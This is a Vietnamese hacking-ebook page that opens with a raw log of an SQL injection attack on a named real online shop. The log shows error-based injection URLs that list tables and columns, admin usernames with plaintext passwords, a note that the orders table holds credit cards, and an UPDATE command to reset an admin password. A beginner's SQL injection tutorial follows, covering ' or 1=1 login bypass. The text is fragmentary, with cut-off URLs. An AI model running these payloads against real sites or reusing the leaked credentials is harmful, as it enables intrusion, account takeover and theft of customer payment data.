1. Trang chủ
  2. » Công Nghệ Thông Tin

Hacker Professional Ebook part 229 pptx

6 101 0

Đang tải... (xem toàn văn)

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Định dạng
Số trang 6
Dung lượng 121,07 KB

Nội dung

downloads dtproperties gifts hackers languages mycompany oitems orders ordertracking pinnumbers prodcategories prodfeatures products projects quantitydiscounts registrant registryitems reviews savedcarts searchresults shipmethods suppliers tblaccess tbllog tbluser templates Code: https://shop.leadtools.com/shopdisplayproducts.asp?catalogID=54 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('tblaccess')and column_name not in (' '))) sp_password Dò các collumn trong table https://shop.leadtools.com/shopdisplayproducts.asp?catalogID=54%20and%201=c on vert(int,(select%20top%201%20column_name%20from%20 information_schema.columns%20where%20table_name=(' configuration')and%20column_name%20not%20in%20('fl dauto','fldusername','fldpassword','id','fieldname ','fieldvalue','fieldgroup','fieldyesno'))) sp_password https://shop.leadtools.com/shopdisplayproducts.asp?catalogID=54%20and%201=c on vert(int,(select%20top%201%20column_name%20from%20 information_schema.columns%20where%20table_name=(' tbluser')and%20column_name%20not%20in%20('fldacces s','fldauto','fldusername','fldpassword','flddatab ase','tablesallowed','admintype','uploaddirectory' ,'adminother1'))) sp_password Ra đc. các column lần lượt, nên chú ý vào : oders chứa CC, tbluser có user, pass admin, configuration chứa link admin https://shop.leadtools.com/shopdispl p?catalogID=54 and 1=convert(int,(select top 1 fldusername+fldpassword from tbluser)) sp_password https://shop.leadtools.com/shopdispl p?catalogID=54 and 1=convert(int,(select fldpassword from tbluser where fldusername='gabriel')) sp_password tblaccess: https://shop.leadtools.com/shopdisplayproducts.asp?catalogID=54%20and%201=c on vert(int,(select%20top%201%20column_name%20from%20 information_schema.columns%20where%20table_name=(' tblaccess')and%20column_name%20not%20in%20('fldaut o','fldname','fldurl','fldcomment','flddatabase')) ) sp_password https://shop.leadtools.com/shopdispl p?catalogID=54 and 1=convert(int,(select top 1 fldurl from tblaccess)) sp_password Ra đc. user/pass admin như sau gabriel/crack69 https://shop.leadtools.com/shopdisplayproducts.asp?catalogID=54%20and%201=c on vert(int,(select%20fldpassword%20from%20tbluser%20 where%20fldusername='gabriel')) sp_password https://shop.leadtools.com/shopdispl gID=54%20union select 1 from configuration sp_password https://shop.leadtools.com/shopdispl ) sp_password UPDATE 'configuration' SET 'fldpassword' = 'dch' WHERE fldusername='gabriel'- - https://shop.leadtools.com/shopdispl ) sp_password [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value '1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23,24,25,26,27,28,29,30,31,32,33,34' to a column of data type int. https://shop.leadtools.com/shopdispl p?catalogID=54 and 1=convert(int,(select fldusername from tbluser where fldpassword='rumi')) sp_password -> 'rumi' https://shop.leadtools.com/shopdispl p?catalogID=54 and 1=convert(int,(select fldusername from tbluser where fldpassword<>'rumi')) sp_password rumi/rumi marketing/marketing freeman/dempfreeman kelly/rumisucks gregg/gregg https://shop.leadtools.com/shopdisplayproducts.asp?catalogID=54%20and%201=c on vert(int,(select%20top%201%20fldpassword%20from%20 tbluser%20where%20(admintype%3C%3E'SUPER'%20and%20 fldusername%3C%3E'gabriel'and%20fldpassword%3C%3E' dempfreeman'%20and%20fldusername%3C%3E'rumi'%20and %20fldusername='kelly'))) sp_password Hik, thêm comment roài nhá Dinhcaohack (vniss) Tổng hợp về SQL Injection (bài 1) Hi all , những người nghiên cứu hacking ở Việt Nam đã nói khá nhiều về kĩ thuật SQL Injection , Fantomas311 còn giữ một số bài viết hay và cơ bản về vấn đề này , post lên cho anh em tham khảo và cho những người đến sau có dịp tìm hiểu về một kĩ thuật hack khá thông dụng trong web hacking PHẦN 1: SQL Injection là gì? SQL Injection là một trong những kiểu hack web đang dần trở nên phổ biến hiện nay. Bằng cách inject các mã SQL query/command vào input trước khi chuyển cho ứng dụng web xử lí, bạn có thể login mà không cần username và password, remote execution, dump data và lấy root của SQL server. Công cụ dùng để tấn công là một trình duyệt web bất kì, chẳng hạn như Internet Explorer, Netscape, Lynx, 2) Tìm kiếm mục tiêu Bạn có thể search các trang web cho phép submit data ở bất kì một search-engine nào trên mạng, chẳng hạn như các trang login, search, feedback, http://vịtcon/index.asp?id=10 Một số trang web chuyển tham số qua các field ẩn, bạn phải xem mã HTML mới thấy rõ. <FORM action=Search/search.asp method=post> <input type=hidden name=A value=C> </FORM> 3) Kiểm tra chử yếu của trang web Thử submit các field username, password hoặc field id, bằng hi' or 1=1 - Login: hi' or 1=1 - Pass: hi' or 1=1 - http://vịtcon/index.asp?id=hi' or 1=1 Nếu site chuyển tham số qua field ẩn, bạn hãy download source HTML, lưu trên đĩa cứng và thay đổi lại URL cho phù hợp. Ví dụ: <FORM action=http://vịtcon/Search/search.asp method=post> <input type=hidden name=A value="hi' or 1=1 "> </FORM> Nếu thành công, bạn có thể login vào mà không cần phải biết username và password 4) Tại sao ' or 1=1 có thể bypass login? Giả sử như có một trang asp link đến một asp trang khác với URL như sau: http://vịtcon/index.asp?category=food Trong URL trên, biến 'category' được gán giá trị là 'food'. Mã asp của trang này có thể như sau (đây chỉ là ví dụ thôi): v_cat = request("category") sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'" set rs=conn.execute(sqlstr) v_cat sẽ chứa giá trị của biến request.category, 'food' và câu lệnh SQL tiếp theo sẽ là: SELECT * FROM product WHERE PCategory='food' Dòng query trên sẽ trả về một tập resultset chứa một hoặc nhiều dòng phù hợp với điều kiện WHERE PCategory='food' Nếu bạn thay đổi URL trên thành http://vịtcon/index.asp?category=food' or 1=1 , biến v_cat sẽ chứa giá trị "food' or 1=1 " và dòng lệnh SQL query sẽ là: SELECT * FROM product WHERE PCategory='food' or 1=1 ' Dòng query trên sẽ select mọi thứ trong table product bất chấp PCategory có bằng 'food' hay không. Hai dấu gạch ngang " " chỉ cho MS SQL server biết đã hết dòng query, mọi thứ còn lại sau " " sẽ bị bỏ qua. Đối với MySQL, bạn hãy thay " " thành "#" Bạn cũng có thể thử cách khác bằng cách submit ' or 'a'='a. Dòng SQL query bây giờ sẽ là: SELECT * FROM product WHERE PCategory='food' or 'a'='a' Một số data khác mà bạn cũng nên submit để biết xem trang web có gặp lửi hay không: ' or 1=1 . downloads dtproperties gifts hackers languages mycompany oitems orders ordertracking pinnumbers prodcategories prodfeatures

Ngày đăng: 04/07/2014, 12:20